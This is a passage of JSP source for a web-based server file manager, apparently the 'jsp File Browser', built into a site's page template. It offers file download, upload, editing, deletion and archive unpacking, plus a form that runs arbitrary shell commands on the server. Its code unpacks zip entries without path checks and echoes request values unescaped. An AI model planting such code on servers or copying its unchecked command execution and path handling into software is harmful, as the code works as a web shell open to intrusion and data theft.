BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f));
byte buffer[] = new byte[8 * 1024];
out.clearBuffer();
OutputStream out_s = new Writer2Stream(out);
copyStreamsWithoutClose(fileInput, out_s, buffer);
fileInput.close();
out_s.flush();
nohtml = true;
dir_view = false;
}
}
else {
request.setAttribute("dir", f.getParent());
request.setAttribute("error", "File " + f.getAbsolutePath()
+ " does not exist or is not readable on the server");
}
}
// Download selected files as zip file
else if ((request.getParameter("Submit") != null)
&& (request.getParameter("Submit").equals(SAVE_AS_ZIP))) {
Vector v = expandFileList(request.getParameterValues("selfile"), false);
//Check if all files in vector are allowed
String notAllowedFile = null;
for (int i = 0;i < v.size(); i++){
File f = (File) v.get(i);
if (!isAllowed(f, false)){
notAllowedFile = f.getAbsolutePath();
break;
}
}
if (notAllowedFile != null){
request.setAttribute("error", "You are not allowed to access " + notAllowedFile);
}
else if (v.size() == 0) {
request.setAttribute("error", "No files selected");
}
else {
File dir_file = new File("" + request.getAttribute("dir"));
int dir_l = dir_file.getAbsolutePath().length();
response.setContentType("application/zip");
response.setHeader("Content-Disposition", "attachment;filename=\"rename_me.zip\"");
out.clearBuffer();
ZipOutputStream zipout = new ZipOutputStream(new Writer2Stream(out));
zipout.setComment("Created by jsp File Browser v. " + VERSION_NR);
zipout.setLevel(COMPRESSION_LEVEL);
for (int i = 0; i < v.size(); i++) {
File f = (File) v.get(i);
if (f.canRead()) {
zipout.putNextEntry(new ZipEntry(f.getAbsolutePath().substring(dir_l + 1)));
BufferedInputStream fr = new BufferedInputStream(new FileInputStream(f));
byte buffer[] = new byte[0xffff];
copyStreamsWithoutClose(fr, zipout, buffer);
/* int b;
while ((b=fr.read())!=-1) zipout.write(b);*/
fr.close();
zipout.closeEntry();
}
}
zipout.finish();
out.flush();
nohtml = true;
dir_view = false;
}
}
// Download file
else if (request.getParameter("downfile") != null) {
String filePath = request.getParameter("downfile");
File f = new File(filePath);
if (!isAllowed(f, false)){
request.setAttribute("dir", f.getParent());
request.setAttribute("error", "You are not allowed to access " + f.getAbsoluteFile());
}
else if (f.exists() && f.canRead()) {
response.setContentType("application/octet-stream");
response.setHeader("Content-Disposition", "attachment;filename=\"" + f.getName()
+ "\"");
response.setContentLength((int) f.length());
BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f));
byte buffer[] = new byte[8 * 1024];
out.clearBuffer();
OutputStream out_s = new Writer2Stream(out);
copyStreamsWithoutClose(fileInput, out_s, buffer);
fileInput.close();
out_s.flush();
nohtml = true;
dir_view = false;
}
else {
request.setAttribute("dir", f.getParent());
request.setAttribute("error", "File " + f.getAbsolutePath()
+ " does not exist or is not readable on the server");
}
}
if (nohtml) return;
//else
// If no parameter is submitted, it will take the path from jsp file browser
if (request.getAttribute("dir") == null) {
String path = null;
if (application.getRealPath(request.getRequestURI()) != null) {
File f = new File(application.getRealPath(request.getRequestURI())).getParentFile();
//This is a hack needed for tomcat
while (f != null && !f.exists())
f = f.getParentFile();
if (f != null)
path = f.getAbsolutePath();
}
if (path == null) { // handle the case where we are not in a directory (ex: war file)
path = new File(".").getAbsolutePath();
}
//Check path
if (!isAllowed(new File(path), false)){
//TODO Blacklist
if (RESTRICT_PATH.indexOf(";")<0) path = RESTRICT_PATH;
else path = RESTRICT_PATH.substring(0, RESTRICT_PATH.indexOf(";"));
}
request.setAttribute("dir", path);
}%>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<meta name="robots" content="noindex">
<meta http-equiv="expires" content="0">
<meta http-equiv="pragma" content="no-cache">
<%
//If a cssfile exists, it will take it
String cssPath = null;
if (application.getRealPath(request.getRequestURI()) != null) cssPath = new File(
application.getRealPath(request.getRequestURI())).getParent()
+ File.separator + CSS_NAME;
if (cssPath == null) cssPath = application.getResource(CSS_NAME).toString();
if (new File(cssPath).exists()) {
%>
<link rel="stylesheet" type="text/css" href="<%=CSS_NAME%>">
<%}
else if (request.getParameter("uplMonitor") == null) {%>
<style type="text/css">
input.button {background-color: #c0c0c0; color: #666666;
border: 1px solid #999999; margin: 5px 1px 5px 1px;}
input.textfield {margin: 5px 1px 5px 1px;}
input.button:Hover { color: #444444 }
table.filelist {background-color:#666666; width:100%; border:0px none #ffffff}
.formular {margin: 1px; background-color:#ffffff; padding: 1em; border:1px solid #000000;}
.formular2 {margin: 1px;}
th { background-color:#c0c0c0 }
tr.mouseout { background-color:#ffffff; }
tr.mousein { background-color:#eeeeee; }
tr.checked { background-color:#cccccc }
tr.mousechecked { background-color:#c0c0c0 }
td { font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; color: #666666;}
td.message { background-color: #FFFF00; color: #000000; text-align:center; font-weight:bold}
td.error { background-color: #FF0000; color: #000000; text-align:center; font-weight:bold}
A { text-decoration: none; }
A:Hover { color : Red; text-decoration : underline; }
BODY { font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; color: #666666;}
</style>
<%}
//Check path
if (!isAllowed(new File((String)request.getAttribute("dir")), false)){
request.setAttribute("error", "You are not allowed to access " + request.getAttribute("dir"));
}
//Upload monitor
else if (request.getParameter("uplMonitor") != null) {%>
<style type="text/css">
BODY { font-family:Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; color: #666666;}
</style><%
String fname = request.getParameter("uplMonitor");
//First opening
boolean first = false;
if (request.getParameter("first") != null) first = true;
UplInfo info = new UplInfo();
if (!first) {
info = UploadMonitor.getInfo(fname);
if (info == null) {
//Windows
int posi = fname.lastIndexOf("\\");
if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1));
}
if (info == null) {
//Unix
int posi = fname.lastIndexOf("/");
if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1));
}
}
dir_view = false;
request.setAttribute("dir", null);
if (info.aborted) {
UploadMonitor.remove(fname);
%>
</head>
<body>
<b>Upload of <%=fname%></b><br><br>
Upload aborted.</body>
</html><%
}
else if (info.totalSize != info.currSize || info.currSize == 0) {
%>
<META HTTP-EQUIV="Refresh" CONTENT="<%=UPLOAD_MONITOR_REFRESH%>;URL=<%=browser_name %>?uplMonitor=<%=URLEncoder.encode(fname)%>">
</head>
<body>
<b>Upload of <%=fname%></b><br><br>
<center>
<table height="20px" width="90%" bgcolor="#eeeeee" style="border:1px solid #cccccc"><tr>
<td bgcolor="blue" width="<%=info.getPercent()%>%"></td><td width="<%=100-info.getPercent()%>%"></td>
</tr></table></center>
<%=convertFileSize(info.currSize)%> from <%=convertFileSize(info.totalSize)%>
(<%=info.getPercent()%> %) uploaded (Speed: <%=info.getUprate()%>).<br>
Time: <%=info.getTimeElapsed()%> from <%=info.getTimeEstimated()%>
</body>
</html><%
}
else {
UploadMonitor.remove(fname);
%>
</head>
<body onload="javascript:window.close()">
<b>Upload of <%=fname%></b><br><br>
Upload finished.
</body>
</html><%
}
}
//Comandwindow
else if (request.getParameter("command") != null) {
if (!NATIVE_COMMANDS){
request.setAttribute("error", "Execution of native commands is not allowed!");
}
else if (!"Cancel".equalsIgnoreCase(request.getParameter("Submit"))) {
%>
<title>Launch commands in <%=request.getAttribute("dir")%></title>
</head>
<body><center>
<h2><%=LAUNCH_COMMAND %></h2><br />
<%
out.println("<form action=\"" + browser_name + "\" method=\"Post\">\n"
+ "<textarea name=\"text\" wrap=\"off\" cols=\"" + EDITFIELD_COLS
+ "\" rows=\"" + EDITFIELD_ROWS + "\" readonly>");
String ret = "";
if (!request.getParameter("command").equalsIgnoreCase(""))
ret = startProcess(
request.getParameter("command"), (String) request.getAttribute("dir"));
out.println(ret);
%></textarea>
<input type="hidden" name="dir" value="<%= request.getAttribute("dir")%>">
<br /><br />
<table class="formular">
<tr><td title="Enter your command">
Command: <input size="<%=EDITFIELD_COLS-5%>" type="text" name="command" value="">
</td></tr>
<tr><td><input class="button" type="Submit" name="Submit" value="Launch">
<input type="hidden" name="sort" value="<%=request.getParameter("sort")%>">
<input type="Submit" class="button" name="Submit" value="Cancel"></td></tr>
</table>
</form>
<br />
<hr>
<center>
<small>jsp File Browser version <%= VERSION_NR%> by <a href="http://www.vonloesch.de">www.vonloesch.de</a></small>
</center>
</center>
</body>
</html>
<%
dir_view = false;
request.setAttribute("dir", null);
}
}
//Click on a filename, special viewer (zip+jar file)
else if (request.getParameter("file") != null) {
File f = new File(request.getParameter("file"));
if (!isAllowed(f, false)){
request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
}
else if (isPacked(f.getName(), false)) {
//ZipFile
try {
ZipFile zf = new ZipFile(f);
Enumeration entries = zf.entries();
%>
<title><%= f.getAbsolutePath()%></title>
</head>
<body>
<h2>Content of <%=conv2Html(f.getName())%></h2><br />
<table class="filelist" cellspacing="1px" cellpadding="0px">
<th>Name</th><th>Uncompressed size</th><th>Compressed size</th><th>Compr. ratio</th><th>Date</th>
<%
long size = 0;
int fileCount = 0;
while (entries.hasMoreElements()) {
ZipEntry entry = (ZipEntry) entries.nextElement();
if (!entry.isDirectory()) {
fileCount++;
size += entry.getSize();
long ratio = 0;
if (entry.getSize() != 0) ratio = (entry.getCompressedSize() * 100)
/ entry.getSize();
out.println("<tr class=\"mouseout\"><td>" + conv2Html(entry.getName())
+ "</td><td>" + convertFileSize(entry.getSize()) + "</td><td>"
+ convertFileSize(entry.getCompressedSize()) + "</td><td>"
+ ratio + "%" + "</td><td>"
+ dateFormat.format(new Date(entry.getTime())) + "</td></tr>");
}
}
zf.close();
//No directory view
dir_view = false;
request.setAttribute("dir", null);
%>
</table>
<p align=center>
<b><%=convertFileSize(size)%> in <%=fileCount%> files in <%=f.getName()%>. Compression ratio: <%=(f.length() * 100) / size%>%
</b></p>
</body></html>
<%
}
catch (ZipException ex) {
request.setAttribute("error", "Cannot read " + f.getName()
+ ", no valid zip file");
}
catch (IOException ex) {
request.setAttribute("error", "Reading of " + f.getName() + " aborted. Error: "
+ ex);
}
}
}
// Upload
else if ((request.getContentType() != null)
&& (request.getContentType().toLowerCase().startsWith("multipart"))) {
if (!ALLOW_UPLOAD){
request.setAttribute("error", "Upload is forbidden!");
}
response.setContentType("text/html");
HttpMultiPartParser parser = new HttpMultiPartParser();
boolean error = false;
try {
int bstart = request.getContentType().lastIndexOf("oundary=");
String bound = request.getContentType().substring(bstart + 8);
int clength = request.getContentLength();
Hashtable ht = parser
.processData(request.getInputStream(), bound, tempdir, clength);
if (!isAllowed(new File((String)ht.get("dir")), false)){
//This is a hack, cos we are writing to this directory
request.setAttribute("error", "You are not allowed to access " + ht.get("dir"));
error = true;
}
else if (ht.get("myFile") != null) {
FileInfo fi = (FileInfo) ht.get("myFile");
File f = fi.file;
UplInfo info = UploadMonitor.getInfo(fi.clientFileName);
if (info != null && info.aborted) {
f.delete();
request.setAttribute("error", "Upload aborted");
}
else {
// Move file from temp to the right dir
String path = (String) ht.get("dir");
if (!path.endsWith(File.separator)) path = path + File.separator;
if (!f.renameTo(new File(path + f.getName()))) {
request.setAttribute("error", "Cannot upload file.");
error = true;
f.delete();
}
}
}
else {
request.setAttribute("error", "No file selected for upload");
error = true;
}
request.setAttribute("dir", (String) ht.get("dir"));
}
catch (Exception e) {
request.setAttribute("error", "Error " + e + ". Upload aborted");
error = true;
}
if (!error) request.setAttribute("message", "File upload correctly finished.");
}
// The form to edit a text file
else if (request.getParameter("editfile") != null) {
File ef = new File(request.getParameter("editfile"));
if (!isAllowed(ef, true)){
request.setAttribute("error", "You are not allowed to access " + ef.getAbsolutePath());
}
else{
%>
<title>Edit <%=conv2Html(request.getParameter("editfile"))%></title>
</head>
<body>
<center>
<h2>Edit <%=conv2Html(request.getParameter("editfile"))%></h2><br />
<%
BufferedReader reader = new BufferedReader(new FileReader(ef));
String disable = "";
if (!ef.canWrite()) disable = " readonly";
out.println("<form action=\"" + browser_name + "\" method=\"Post\">\n"
+ "<textarea name=\"text\" wrap=\"off\" cols=\"" + EDITFIELD_COLS
+ "\" rows=\"" + EDITFIELD_ROWS + "\"" + disable + ">");
String c;
// Write out the file and check if it is a win or unix file
int i;
boolean dos = false;
boolean cr = false;
while ((i = reader.read()) >= 0) {
out.print(conv2Html(i));
if (i == '\r') cr = true;
else if (cr && (i == '\n')) dos = true;
else cr = false;
}
reader.close();
//No File directory is shown
request.setAttribute("dir", null);
dir_view = false;
%></textarea><br /><br />
<table class="formular">
<input type="hidden" name="nfile" value="<%= request.getParameter("editfile")%>">
<input type="hidden" name="sort" value="<%=request.getParameter("sort")%>">
<tr><td colspan="2"><input type="radio" name="lineformat" value="dos" <%= dos?"checked":""%>>Ms-Dos/Windows
<input type="radio" name="lineformat" value="unix" <%= dos?"":"checked"%>>Unix
<input type="checkbox" name="Backup" checked>Write backup</td></tr>
<tr><td title="Enter the new filename"><input type="text" name="new_name" value="<%=ef.getName()%>">
<input type="Submit" name="Submit" value="Save"></td>
</form>
<form action="<%=browser_name%>" method="Post">
<td align="left">
<input type="Submit" name="Submit" value="Cancel">
<input type="hidden" name="nfile" value="<%= request.getParameter("editfile")%>">
<input type="hidden" name="sort" value="<%=request.getParameter("sort")%>">
</td>
</form>
</tr>
</table>
</center>
<br />
<hr>
<center>
<small>jsp File Browser version <%= VERSION_NR%> by <a href="http://www.vonloesch.de">www.vonloesch.de</a></small>
</center>
</body>
</html>
<%
}
}
// Save or cancel the edited file
else if (request.getParameter("nfile") != null) {
File f = new File(request.getParameter("nfile"));
if (request.getParameter("Submit").equals("Save")) {
File new_f = new File(getDir(f.getParent(), request.getParameter("new_name")));
if (!isAllowed(new_f, true)){
request.setAttribute("error", "You are not allowed to access " + new_f.getAbsolutePath());
}
if (new_f.exists() && new_f.canWrite() && request.getParameter("Backup") != null) {
File bak = new File(new_f.getAbsolutePath() + ".bak");
bak.delete();
new_f.renameTo(bak);
}
if (new_f.exists() && !new_f.canWrite()) request.setAttribute("error",
"Cannot write to " + new_f.getName() + ", file is write protected.");
else {
BufferedWriter outs = new BufferedWriter(new FileWriter(new_f));
StringReader text = new StringReader(request.getParameter("text"));
int i;
boolean cr = false;
String lineend = "\n";
if (request.getParameter("lineformat").equals("dos")) lineend = "\r\n";
while ((i = text.read()) >= 0) {
if (i == '\r') cr = true;
else if (i == '\n') {
outs.write(lineend);
cr = false;
}
else if (cr) {
outs.write(lineend);
cr = false;
}
else {
outs.write(i);
cr = false;
}
}
outs.flush();
outs.close();
}
}
request.setAttribute("dir", f.getParent());
}
//Unpack file to the current directory without overwriting
else if (request.getParameter("unpackfile") != null) {
File f = new File(request.getParameter("unpackfile"));
String root = f.getParent();
request.setAttribute("dir", root);
if (!isAllowed(new File(root), true)){
request.setAttribute("error", "You are not allowed to access " + root);
}
//Check if file exists
else if (!f.exists()) {
request.setAttribute("error", "Cannot unpack " + f.getName()
+ ", file does not exist");
}
//Check if directory is readonly
else if (!f.getParentFile().canWrite()) {
request.setAttribute("error", "Cannot unpack " + f.getName()
+ ", directory is write protected.");
}
//GZip
else if (f.getName().toLowerCase().endsWith(".gz")) {
//New name is old Name without .gz
String newName = f.getAbsolutePath().substring(0, f.getAbsolutePath().length() - 3);
try {
byte buffer[] = new byte[0xffff];
copyStreams(new GZIPInputStream(new FileInputStream(f)), new FileOutputStream(
newName), buffer);
}
catch (IOException ex) {
request.setAttribute("error", "Unpacking of " + f.getName()
+ " aborted. Error: " + ex);
}
}
//Else try Zip
else {
try {
ZipFile zf = new ZipFile(f);
Enumeration entries = zf.entries();
//First check whether a file already exist
boolean error = false;
while (entries.hasMoreElements()) {
ZipEntry entry = (ZipEntry) entries.nextElement();
if (!entry.isDirectory()
&& new File(root + File.separator + entry.getName()).exists()) {
request.setAttribute("error", "Cannot unpack " + f.getName()
+ ", File " + entry.getName() + " already exists.");
error = true;
break;
}
}
if (!error) {
//Unpack File
entries = zf.entries();
byte buffer[] = new byte[0xffff];
while (entries.hasMoreElements()) {
ZipEntry entry = (ZipEntry) entries.nextElement();
File n = new File(root + File.separator + entry.getName());
if (entry.isDirectory()) n.mkdirs();
else {
n.getParentFile().mkdirs();
n.createNewFile();
copyStreams(zf.getInputStream(entry), new FileOutputStream(n),
buffer);
}
}
zf.close();
request.setAttribute("message", "Unpack of " + f.getName()
+ " was successful.");
}
}
catch (ZipException ex) {
request.setAttribute("error", "Cannot unpack " + f.getName()
+ ", no valid zip file");
}
catch (IOException ex) {
request.setAttribute("error", "Unpacking of " + f.getName()
+ " aborted. Error: " + ex);
}
}
}
// Delete Files
else if ((request.getParameter("Submit") != null)
&& (request.getParameter("Submit").equals(DELETE_FILES))) {
Vector v = expandFileList(request.getParameterValues("selfile"), true);
boolean error = false;
//delete backwards
for (int i = v.size() - 1; i >= 0; i--) {
File f = (File) v.get(i);
if (!isAllowed(f, true)){
request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
error = true;
break;
}
if (!f.canWrite() || !f.delete()) {
request.setAttribute("error", "Cannot delete " + f.getAbsolutePath()
+ ". Deletion aborted");
error = true;
break;
}
}
if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files deleted");
else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File deleted");
else if (!error) request.setAttribute("error", "No files selected");
}
// Create Directory
else if ((request.getParameter("Submit") != null)
&& (request.getParameter("Submit").equals(CREATE_DIR))) {
String dir = "" + request.getAttribute("dir");
String dir_name = request.getParameter("cr_dir");
String new_dir = getDir(dir, dir_name);
if (!isAllowed(new File(new_dir), true)){
request.setAttribute("error", "You are not allowed to access " + new_dir);
}
else if (new File(new_dir).mkdirs()) {
request.setAttribute("message", "Directory created");
}
else request.setAttribute("error", "Creation of directory " + new_dir + " failed");
}
// Create a new empty file
else if ((request.getParameter("Submit") != null)
&& (request.getParameter("Submit").equals(CREATE_FILE))) {
String dir = "" + request.getAttribute("dir");
String file_name = request.getParameter("cr_dir");
String new_file = getDir(dir, file_name);
if (!isAllowed(new File(new_file), true)){
request.setAttribute("error", "You are not allowed to access " + new_file);
}
// Test, if file_name is empty
else if (!"".equals(file_name.trim()) && !file_name.endsWith(File.separator)) {
if (new File(new_file).createNewFile()) request.setAttribute("message",
"File created");
else request.setAttribute("error", "Creation of file " + new_file + " failed");
}
else request.setAttribute("error", "Error: " + file_name + " is not a valid filename");
}
// Rename a file
else if ((request.getParameter("Submit") != null)
&& (request.getParameter("Submit").equals(RENAME_FILE))) {
Vector v = expandFileList(request.getParameterValues("selfile"), true);
String dir = "" + request.getAttribute("dir");
String new_file_name = request.getParameter("cr_dir");
String new_file = getDir(dir, new_file_name);
if (!isAllowed(new File(new_file), true)){
request.setAttribute("error", "You are not allowed to access " + new_file);
}
// The error conditions:
// 1) Zero Files selected
else if (v.size() <= 0) request.setAttribute("error",
"Select exactly one file or folder. Rename failed");
// 2a) Multiple files selected and the first isn't a dir
// Here we assume that expandFileList builds v from top-bottom, starting with the dirs
else if ((v.size() > 1) && !(((File) v.get(0)).isDirectory())) request.setAttribute(
"error", "Select exactly one file or folder. Rename failed");
// 2b) If there are multiple files from the same directory, rename fails
else if ((v.size() > 1) && ((File) v.get(0)).isDirectory()
&& !(((File) v.get(0)).getPath().equals(((File) v.get(1)).getParent()))) {
request.setAttribute("error", "Select exactly one file or folder. Rename failed");
}
else {
File f = (File) v.get(0);
if (!isAllowed(f, true)){
request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
}
// Test, if file_name is empty
else if ((new_file.trim() != "") && !new_file.endsWith(File.separator)) {
if (!f.canWrite() || !f.renameTo(new File(new_file.trim()))) {
request.setAttribute("error", "Creation of file " + new_file + " failed");
}
else request.setAttribute("message", "Renamed file "
+ ((File) v.get(0)).getName() + " to " + new_file);
}
else request.setAttribute("error", "Error: \"" + new_file_name
+ "\" is not a valid filename");
}
}
// Move selected file(s)
else if ((request.getParameter("Submit") != null)
&& (request.getParameter("Submit").equals(MOVE_FILES))) {
Vector v = expandFileList(request.getParameterValues("selfile"), true);
String dir = "" + request.getAttribute("dir");
String dir_name = request.getParameter("cr_dir");
String new_dir = getDir(dir, dir_name);
if (!isAllowed(new File(new_dir), false)){
request.setAttribute("error", "You are not allowed to access " + new_dir);
}
else{
boolean error = false;
// This ensures that new_dir is a directory
if (!new_dir.endsWith(File.separator)) new_dir += File.separator;
for (int i = v.size() - 1; i >= 0; i--) {
File f = (File) v.get(i);
if (!isAllowed(f, true)){
request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
error = true;
break;
}
else if (!f.canWrite() || !f.renameTo(new File(new_dir
+ f.getAbsolutePath().substring(dir.length())))) {
request.setAttribute("error", "Cannot move " + f.getAbsolutePath()
+ ". Move aborted");
error = true;
break;
}
}
if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files moved");
else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File moved");
else if (!error) request.setAttribute("error", "No files selected");
}
}
// Copy Files
else if ((request.getParameter("Submit") != null)
&& (request.getParameter("Submit").equals(COPY_FILES))) {
Vector v = expandFileList(request.getParameterValues("selfile"), true);
String dir = (String) request.getAttribute("dir");
if (!dir.endsWith(File.separator)) dir += File.separator;
String dir_name = request.getParameter("cr_dir");
String new_dir = getDir(dir, dir_name);
if (!isAllowed(new File(new_dir), true)){
request.setAttribute("error", "You are not allowed to access " + new_dir);
}
else{
boolean error = false;
if (!new_dir.endsWith(File.separator)) new_dir += File.separator;
try {
byte buffer[] = new byte[0xffff];
for (int i = 0; i < v.size(); i++) {
File f_old = (File) v.get(i);
File f_new = new File(new_dir + f_old.getAbsolutePath().substring(dir.length()));
if (!isAllowed(f_old, false)|| !isAllowed(f_new, true)){
request.setAttribute("error", "You are not allowed to access " + f_new.getAbsolutePath());
error = true;
}
else if (f_old.isDirectory()) f_new.mkdirs();
// Overwriting is forbidden
else if (!f_new.exists()) {
copyStreams(new FileInputStream(f_old), new FileOutputStream(f_new), buffer);
}
else {
// File exists
request.setAttribute("error", "Cannot copy " + f_old.getAbsolutePath()
+ ", file already exists. Copying aborted");
error = true;
break;
}
}
}
catch (IOException e) {
request.setAttribute("error", "Error " + e + ". Copying aborted");
error = true;
}
if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files copied");
else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File copied");
else if (!error) request.setAttribute("error", "No files selected");
}
}
// Directory viewer
if (dir_view && request.getAttribute("dir") != null) {
File f = new File("" + request.getAttribute("dir"));
//Check, whether the dir exists
if (!f.exists() || !isAllowed(f, false)) {
if (!f.exists()){
request.setAttribute("error", "Directory " + f.getAbsolutePath() + " does not exist.");
}
else{
request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath());
}
//if attribute olddir exists, it will change to olddir
if (request.getAttribute("olddir") != null && isAllowed(new File((String) request.getAttribute("olddir")), false)) {
f = new File("" + request.getAttribute("olddir"));
}
//try to go to the parent dir
else {
if (f.getParent() != null && isAllowed(f, false)) f = new File(f.getParent());
}
//If this dir also do also not exist, go back to browser.jsp root path
if (!f.exists()) {
String path = null;
if (application.getRealPath(request.getRequestURI()) != null) path = new File(
application.getRealPath(request.getRequestURI())).getParent();
if (path == null) // handle the case were we are not in a directory (ex: war file)
path = new File(".").getAbsolutePath();
f = new File(path);
}
if (isAllowed(f, false)) request.setAttribute("dir", f.getAbsolutePath());
else request.setAttribute("dir", null);
}
%>
<script type="text/javascript" src="<%=browser_name %>?Javascript">
</script>
<link type="text/css" rel="stylesheet" href="../css/styles_ceso.css"/>
<link type="text/css" rel="stylesheet" href="../css/ticker/simpleTicker.css" />
<link type="text/css" rel="stylesheet" href="../css/dropdown/dropdown.css" media="screen" />
<link type="text/css" rel="stylesheet" href="../css/dropdown/default.advanced.css" media="screen" />
<link type="text/css" rel="stylesheet" href="../css/form.css" media="screen"/>
<link type="text/css" rel="stylesheet" href="../css/jquery.jnotify-alt.css" media="all" />
<link type="text/css" rel="stylesheet" href="../css/jqModal.css" />
<link type="text/css" rel="stylesheet" href="../css/common.css" />
<link type="text/css" rel="stylesheet" href="../css/redmond/jquery-ui-1.8.14.custom.css" />
<link type="text/css" rel="stylesheet" href="../css/ui.multiselect.css" />
<title><%=request.getAttribute("dir")%></title>
</head>
<body>
<div id="container">
<div id="header">
<div id="bkorotator">
<img alt="" src="../images/rotator/1.jpg" />
</div>
</div>
<div id="menu">
<%@include file="../menu.jsp" %>
</div>
<div id="content">
<%
//Output message
if (request.getAttribute("message") != null) {
out.println("<table border=\"0\" width=\"100%\"><tr><td class=\"message\">");
out.println(request.getAttribute("message"));
out.println("</td></tr></table>");
}
//Output error
if (request.getAttribute("error") != null) {
out.println("<table border=\"0\" width=\"100%\"><tr><td class=\"error\">");
out.println(request.getAttribute("error"));
out.println("</td></tr></table>");
}
if (request.getAttribute("dir") != null){
%>
<form class="formular" action="<%= browser_name %>" method="Post" name="FileList">
Filename filter: <input name="filt" onKeypress="event.cancelBubble=true;" onkeyup="filter(this)" type="text">
<br /><br />
<table id="filetable" class="filelist" cellspacing="1px" cellpadding="0px">
<%
// Output the table, starting with the headers.
String dir = URLEncoder.encode("" + request.getAttribute("dir"));
String cmd = browser_name + "?dir=" + dir;
int sortMode = 1;
if (request.getParameter("sort") != null) sortMode = Integer.parseInt(request
.getParameter("sort"));
int[] sort = new int[] {1, 2, 3, 4};
for (int i = 0; i < sort.length; i++)
if (sort[i] == sortMode) sort[i] = -sort[i];
out.print("<tr><th>&nbsp;</th><th title=\"Sort files by name\" align=left><a href=\""
+ cmd + "&amp;sort=" + sort[0] + "\">Name</a></th>"
+ "<th title=\"Sort files by size\" align=\"right\"><a href=\"" + cmd
+ "&amp;sort=" + sort[1] + "\">Size</a></th>"
+ "<th title=\"Sort files by type\" align=\"center\"><a href=\"" + cmd
+ "&amp;sort=" + sort[3] + "\">Type</a></th>"
+ "<th title=\"Sort files by date\" align=\"left\"><a href=\"" + cmd
+ "&amp;sort=" + sort[2] + "\">Date</a></th>"
+ "<th>&nbsp;</th>");
if (!READ_ONLY) out.print ("<th>&nbsp;</th>");
out.println("</tr>");
char trenner = File.separatorChar;
// Output the Root-Dirs, without FORBIDDEN_DRIVES
File[] entry = File.listRoots();
for (int i = 0; i < entry.length; i++) {
boolean forbidden = false;
for (int i2 = 0; i2 < FORBIDDEN_DRIVES.length; i2++) {
if (entry[i].getAbsolutePath().toLowerCase().equals(FORBIDDEN_DRIVES[i2])) forbidden = true;
}
if (!forbidden) {
out.println("<tr class=\"mouseout\" onmouseover=\"this.className='mousein'\""
+ "onmouseout=\"this.className='mouseout'\">");
out.println("<td>&nbsp;</td><td align=left >");
String name = URLEncoder.encode(entry[i].getAbsolutePath());
String buf = entry[i].getAbsolutePath();
out.println(" &nbsp;<a href=\"" + browser_name + "?sort=" + sortMode
+ "&amp;dir=" + name + "\">[" + buf + "]</a>");
out.print("</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td></td></tr>");
}
}
// Output the parent directory link ".."
if (f.getParent() != null) {
out.println("<tr class=\"mouseout\" onmouseover=\"this.className='mousein'\""
+ "onmouseout=\"this.className='mouseout'\">");
out.println("<td></td><td align=left>");
out.println(" &nbsp;<a href=\"" + browser_name + "?sort=" + sortMode + "&amp;dir="
+ URLEncoder.encode(f.getParent()) + "\">" + FOL_IMG + "[..]</a>");
out.print("</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td></td></tr>");
}
// Output all files and dirs and calculate the number of files and total size
entry = f.listFiles();
if (entry == null) entry = new File[] {};
long totalSize = 0; // The total size of the files in the current directory
long fileCount = 0; // The count of files in the current working directory
if (entry != null && entry.length > 0) {
Arrays.sort(entry, new FileComp(sortMode));
for (int i = 0; i < entry.length; i++) {
String name = URLEncoder.encode(entry[i].getAbsolutePath());
String type = "File"; // This String will tell the extension of the file
if (entry[i].isDirectory()) type = "DIR"; // It's a DIR
else {
String tempName = entry[i].getName().replace(' ', '_');
if (tempName.lastIndexOf('.') != -1) type = tempName.substring(
tempName.lastIndexOf('.')).toLowerCase();
}
String ahref = "<a onmousedown=\"dis()\" href=\"" + browser_name + "?sort="
+ sortMode + "&amp;";
String dlink = "&nbsp;"; // The "Download" link
String elink = "&nbsp;"; // The "Edit" link
String buf = conv2Html(entry[i].getName());
if (!entry[i].canWrite()) buf = "<i>" + buf + "</i>";
String link = buf; // The standard view link, uses Mime-type
if (entry[i].isDirectory()) {
if (entry[i].canRead() && USE_DIR_PREVIEW) {
//Show the first DIR_PREVIEW_NUMBER directory entries in a tooltip
File[] fs = entry[i].listFiles();
if (fs == null) fs = new File[] {};
Arrays.sort(fs, new FileComp());
StringBuffer filenames = new StringBuffer();
for (int i2 = 0; (i2 < fs.length) && (i2 < 10); i2++) {
String fname = conv2Html(fs[i2].getName());
if (fs[i2].isDirectory()) filenames.append("[" + fname + "];");
else filenames.append(fname + ";");
}
if (fs.length > DIR_PREVIEW_NUMBER) filenames.append("...");
else if (filenames.length() > 0) filenames
.setLength(filenames.length() - 1);
link = ahref + "dir=" + name + "\" title=\"" + filenames + "\">"
+ FOL_IMG + "[" + buf + "]</a>";
}
else if (entry[i].canRead()) {
link = ahref + "dir=" + name + "\">" + FOL_IMG + "[" + buf + "]</a>";
}
else link = FOL_IMG + "[" + buf + "]";
}
else if (entry[i].isFile()) { //Entry is file
totalSize = totalSize + entry[i].length();
fileCount = fileCount + 1;
if (entry[i].canRead()) {
dlink = ahref + "downfile=" + name + "\">Download</a>";
//If you click at the filename
if (USE_POPUP) link = ahref + "file=" + name + "\" target=\"_blank\">"
+ buf + "</a>";
else link = ahref + "file=" + name + "\">" + buf + "</a>";
if (entry[i].canWrite()) { // The file can be edited
//If it is a zip or jar File you can unpack it
